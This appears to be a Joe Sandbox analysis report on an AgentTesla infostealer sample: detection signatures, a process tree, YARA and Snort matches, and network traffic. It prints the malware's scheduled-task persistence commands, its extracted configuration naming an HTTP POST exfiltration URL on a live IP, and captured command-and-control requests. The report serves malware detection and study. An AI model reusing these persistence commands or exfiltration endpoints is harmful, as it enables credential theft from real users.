Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
pdP5Rv9pPW.exe

Overview

General Information

Sample Name:pdP5Rv9pPW.exe
Analysis ID:691823
MD5:18e913ec810a1131c23d6fea7526c4f8
SHA1:96c426169c87505e950898ad38913cc726bf198d
SHA256:548a9d790d8d54baf1faf9c67133398a96fad5add7daa35e89aad9d777bd103d
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Injects files into Windows application
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Machine Learning detection for sample
Binary or sample is protected by dotNetProtector
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
PE file contains executable resources (Code or Archives)
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • pdP5Rv9pPW.exe (PID: 5704 cmdline: "C:\Users\user\Desktop\pdP5Rv9pPW.exe" MD5: 18E913EC810A1131C23D6FEA7526C4F8)
    • vbc.exe (PID: 5224 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe MD5: B3A917344F5610BEEC562556F11300FA)
    • cmd.exe (PID: 5020 cmdline: cmd" /c mkdir "C:\Users\user\AppData\Roaming\fghn MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 2188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5076 cmdline: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 6128 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f MD5: 15FF7D8324231381BAD48A052F85DF04)
    • cmd.exe (PID: 4980 cmdline: cmd" /c copy "C:\Users\user\Desktop\pdP5Rv9pPW.exe" "C:\Users\user\AppData\Roaming\fghn\fghn.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • excel.exe (PID: 3980 cmdline: "C:\Users\user\AppData\Roaming\excel\excel.exe" MD5: B3A917344F5610BEEC562556F11300FA)
    • conhost.exe (PID: 3372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • excel.exe (PID: 992 cmdline: "C:\Users\user\AppData\Roaming\excel\excel.exe" MD5: B3A917344F5610BEEC562556F11300FA)
    • conhost.exe (PID: 5728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • fghn.exe (PID: 5836 cmdline: C:\Users\user\AppData\Roaming\fghn\fghn.exe MD5: 18E913EC810A1131C23D6FEA7526C4F8)
    • vbc.exe (PID: 1608 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe MD5: B3A917344F5610BEEC562556F11300FA)
    • cmd.exe (PID: 5436 cmdline: cmd" /c mkdir "C:\Users\user\AppData\Roaming\fghn MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 3372 cmdline: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 5332 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f MD5: 15FF7D8324231381BAD48A052F85DF04)
    • cmd.exe (PID: 4888 cmdline: cmd" /c copy "C:\Users\user\AppData\Roaming\fghn\fghn.exe" "C:\Users\user\AppData\Roaming\fghn\fghn.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "http://141.98.6.75/weption/inc/0986372054b5f8.php"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
      • 0x30055:$a13: get_DnsResolver
      • 0x2e849:$a20: get_LastAccessed
      • 0x309e9:$a27: set_InternalServerPort
      • 0x30d02:$a30: set_GuidMasterKey
      • 0x2e950:$a33: get_Clipboard
      • 0x2e95e:$a34: get_Keyboard
      • 0x2fc88:$a35: get_ShiftKeyDown
      • 0x2fc99:$a36: get_AltKeyDown
      • 0x2e96b:$a37: get_Password
      • 0x2f40a:$a38: get_PasswordHash
      • 0x3046b:$a39: get_DefaultCredentials
      00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          Click to see the 12 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.pdP5Rv9pPW.exe.3996170.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            2.0.vbc.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              2.0.vbc.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.pdP5Rv9pPW.exe.3996170.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                  2.0.vbc.exe.400000.0.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                  • 0x32b1b:$s10: logins
                  • 0x32582:$s11: credential
                  • 0x2eb50:$g1: get_Clipboard
                  • 0x2eb5e:$g2: get_Keyboard
                  • 0x2eb6b:$g3: get_Password
                  • 0x2fe78:$g4: get_CtrlKeyDown
                  • 0x2fe88:$g5: get_ShiftKeyDown
                  • 0x2fe99:$g6: get_AltKeyDown
                  Click to see the 15 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  Timestamp:192.168.2.4141.98.6.7549717802034579 08/28/22-17:19:41.645966
                  SID:2034579
                  Source Port:49717
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.4141.98.6.7549753802034579 08/28/22-17:21:11.426704
                  SID:2034579
                  Source Port:49753
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: pdP5Rv9pPW.exeVirustotal: Detection: 66%Perma Link
                  Source: pdP5Rv9pPW.exeReversingLabs: Detection: 51%
                  Antivirus detection for URL or domain
                  Source: http://141.98.6.75/weption/inc/0986372054b5f8.phpAvira URL Cloud: Label: phishing
                  Multi AV Scanner detection for domain / URL
                  Source: http://141.98.6.75Virustotal: Detection: 5%Perma Link
                  Source: http://141.98.6.75/weption/inc/0986372054b5f8.phpVirustotal: Detection: 11%Perma Link
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeReversingLabs: Detection: 51%
                  Machine Learning detection for sample
                  Source: pdP5Rv9pPW.exeJoe Sandbox ML: detected
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeJoe Sandbox ML: detected
                  Source: 2.0.vbc.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                  Source: 0.2.pdP5Rv9pPW.exe.39ca790.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "http://141.98.6.75/weption/inc/0986372054b5f8.php"}
                  Source: pdP5Rv9pPW.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: pdP5Rv9pPW.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: vbc.pdb source: vbc.exe, 00000002.00000003.370543337.000000000A09D000.00000004.00000800.00020000.00000000.sdmp, excel.exe, 0000000C.00000000.391226032.0000000001261000.00000020.00000001.01000000.00000007.sdmp, excel.exe.2.dr

                  Software Vulnerabilities

                  barindex
                  Document exploit detected (process start blacklist hit)
                  Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess created: C:\Windows\System32\conhost.exe

                  Networking

                  barindex
                  Snort IDS alert for network traffic
                  Source: TrafficSnort IDS: 2034579 ET TROJAN AgentTesla Communicating with CnC Server 192.168.2.4:49717 -> 141.98.6.75:80
                  Source: TrafficSnort IDS: 2034579 ET TROJAN AgentTesla Communicating with CnC Server 192.168.2.4:49753 -> 141.98.6.75:80
                  Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                  Source: global trafficHTTP traffic detected: POST /weption/inc/0986372054b5f8.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0Content-Type: application/x-www-form-urlencodedHost: 141.98.6.75Content-Length: 580Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /weption/inc/0986372054b5f8.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0Content-Type: application/x-www-form-urlencodedHost: 141.98.6.75Content-Length: 580Expect: 100-continueConnection: Keep-Alive
                  Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.75
                  Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.75
                  Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.75
                  Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.75
                  Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.75
                  Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.75
                  Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.75
                  Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.75
                  Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.75
                  Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.75
                  Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.75
                  Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.75
                  Source: unknownTCP traffic detected without corresponding DNS query: 141.98.6.75
                  Source: vbc.exe, 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                  Source: vbc.exe, 00000002.00000002.541792222.0000000006E02000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.589800021.0000000007571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.98.6.75
                  Source: vbc.exe, 00000002.00000002.541792222.0000000006E02000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.589800021.0000000007571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.98.6.75/weption/inc/0986372054b5f8.php
                  Source: vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.98.6.75/weption/inc/0986372054b5f8.php127.0.0.1POST
                  Source: vbc.exe, 00000017.00000002.583884404.000000000552A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://141.98.6.75/weption/inc/0986372054b5f8.phpa
                  Source: vbc.exe, 00000017.00000002.583884404.000000000552A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://141.98.6.75/weption/inc/0986372054b5f8.phpa(
                  Source: vbc.exe, 00000002.00000002.541792222.0000000006E02000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.589800021.0000000007571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.98.6.754
                  Source: vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                  Source: vbc.exe, 00000017.00000002.590068919.00000000075B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://X7rzdy8x3IrJP.net
                  Source: vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ZWXWPK.com
                  Source: excel.exe, 0000000C.00000002.397005792.00000000006FA000.00000004.00000010.00020000.00000000.sdmp, excel.exe, 00000010.00000002.413724237.00000000004FA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft
                  Source: vbc.exe, 00000002.00000002.541792222.0000000006E02000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.589800021.0000000007571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: vbc.exe, 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%
                  Source: vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%appdata
                  Source: vbc.exe, 00000017.00000002.583884404.000000000552A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://di.98.6.75/weption/inc/0986372054b5f8.php
                  Source: vbc.exe, 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                  Source: unknownHTTP traffic detected: POST /weption/inc/0986372054b5f8.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0Content-Type: application/x-www-form-urlencodedHost: 141.98.6.75Content-Length: 580Expect: 100-continueConnection: Keep-Alive

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Installs a global keyboard hook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 2.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 0.2.pdP5Rv9pPW.exe.3996170.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 0.2.pdP5Rv9pPW.exe.3996170.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: 2.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: 0.2.pdP5Rv9pPW.exe.39ca790.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 0.2.pdP5Rv9pPW.exe.39ca790.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: 0.2.pdP5Rv9pPW.exe.39ca790.0.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 0.2.pdP5Rv9pPW.exe.39ca790.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: 0.2.pdP5Rv9pPW.exe.3996170.1.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                  Source: 0.2.pdP5Rv9pPW.exe.3996170.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: 00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: 00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: Process Memory Space: pdP5Rv9pPW.exe PID: 5704, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  Source: Process Memory Space: vbc.exe PID: 5224, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                  .NET source code contains very large array initializations
                  Source: 2.0.vbc.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b347C8262u002d2EBEu002d4E96u002d94BFu002dA26D5CC8C515u007d/u0038F8FDB3Bu002d6BBBu002d4200u002dAC0Au002d6D05451697D6.csLarge array initialization: .cctor: array initializer size 11651
                  Source: pdP5Rv9pPW.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 2.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 0.2.pdP5Rv9pPW.exe.3996170.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 0.2.pdP5Rv9pPW.exe.3996170.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: 2.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: 0.2.pdP5Rv9pPW.exe.39ca790.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 0.2.pdP5Rv9pPW.exe.39ca790.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: 0.2.pdP5Rv9pPW.exe.39ca790.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 0.2.pdP5Rv9pPW.exe.39ca790.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: 0.2.pdP5Rv9pPW.exe.3996170.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                  Source: 0.2.pdP5Rv9pPW.exe.3996170.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: 00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: 00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: Process Memory Space: pdP5Rv9pPW.exe PID: 5704, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: Process Memory Space: vbc.exe PID: 5224, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_00D52C4D0_2_00D52C4D
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_04EB5CF00_2_04EB5CF0
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_04EB00400_2_04EB0040
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_04ECAF600_2_04ECAF60
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_04EC57A00_2_04EC57A0
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_04ED6FE50_2_04ED6FE5
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_04ED00060_2_04ED0006
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_04EE5BC80_2_04EE5BC8
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_04EE00400_2_04EE0040
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_04EF5D480_2_04EF5D48
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_04EF00400_2_04EF0040
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_04EE00060_2_04EE0006
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_04ECAF510_2_04ECAF51
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_04EC57910_2_04EC5791
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_04EF00060_2_04EF0006
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_04F0F0802_2_04F0F080
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_04F061202_2_04F06120
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_04F0F3C82_2_04F0F3C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_04F0F3BD2_2_04F0F3BD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_09EE88602_2_09EE8860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_09EECA002_2_09EECA00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_09EE1FF82_2_09EE1FF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_09EE00402_2_09EE0040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_09EE2A582_2_09EE2A58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A276E0C2_2_0A276E0C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A27C29F2_2_0A27C29F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A27C6E02_2_0A27C6E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A2798482_2_0A279848
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A2733302_2_0A273330
